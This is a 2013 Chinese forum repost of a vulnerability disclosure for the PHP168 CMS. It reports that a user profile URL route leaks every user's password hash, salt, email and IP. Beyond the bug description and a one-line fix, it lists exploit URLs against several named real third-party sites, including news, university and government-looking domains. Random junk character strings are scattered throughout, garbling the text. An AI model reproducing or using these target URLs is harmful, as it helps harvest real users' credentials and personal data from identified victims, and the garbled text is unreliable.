|
简要描述: 国微PHP168中出现了一处神奇的array,可致全站用户数据泄露。泄露的内容包括全站用户的密码密文、邮箱、密码salt、IP等敏感信息。 详细说明:PHP168程序内置“用户”模块包含用户个人资料展示页面。在很多实际场景中,这个页面不会在前台使用,但可直接通过URL进行访问。页面路由为:/homepage.php/[用户名]/member-profile ]1 ~5 b9 w# D0 V& M2 Q4 @: u5 i
1 U1 g, j) G9 w6 s7 K; B以PHP168官方演示站点为例,查看任意用户信息的页面链接为:2 M1 T, N U' J# z: N- ?
2 W( N$ Y. h; v* |
http://php168.cn/com/homepage.php/admin/member-profile; @, b7 T/ e" U6 L
' m3 ]5 a$ d* I5 M由于该模块代码中出现了一句神奇的array,导致用户数据表内所有数据被当作数组取出直接显示出来。
9 ^; V" a/ W$ {; L( j D! [; Ghttp://www.myhack58.com/Article/UploadPic/2013-9/2013920918425520.jpg: o8 t+ V- U3 c3 A8 ^- e5 l
& R% [3 i v+ v7 S 漏洞证明:该漏洞影响使用该CMS系统的站点,以PHP168官网上的客户案例为例:
" Y7 a& w0 y$ L- a; c9 y3 G+ H& R" h8 ?/ j% T- G/ e9 j ~
http://www.zjfzol.com.cn/homepage.php/admin/member-profile/ {0 C# X8 B2 v( M1 O" J4 K% T
. r9 t: a$ ]& e `1 ~! \6 phttp://www.scswl.cn/homepage.php/admin/member-profile) p/ C. T" {# a$ N) c. A* _2 a/ n
2 n: w* l8 G6 [5 E$ w$ X2 f
http://www.tunet.edu.cn/homepage.php/admin/member-profile' A9 o4 z0 r* w1 }# ]8 ?9 R& w
4 {' ]2 O( g' S/ chttp://www.itlead.com.cn/homepage.php/admin/member-profile
+ o1 i9 Z' V3 J9 H! K- W
. c4 n y) P3 N; c: f9 v& m! jhttp://www.aedp.cn/homepage.php/admin/member-profile
5 x% S0 m2 U8 R/ m0 W' x/ [- N n8 Y3 f9 q, S
http://www.qianlongnews.com/homepage.php/test/member-profile% o$ _ Z/ j4 p. C" n( E6 W" Y
. z$ o+ g5 ?! M
http://ny.zlxk.com/gov/homepage.php/admin/member-profile 修复方案:去掉输出 [/td][/tr]
- i* ]7 f, y& |2 j! A* h, k[/table] | 
发表于 2013-9-21 16:02:53
收藏
支持
反对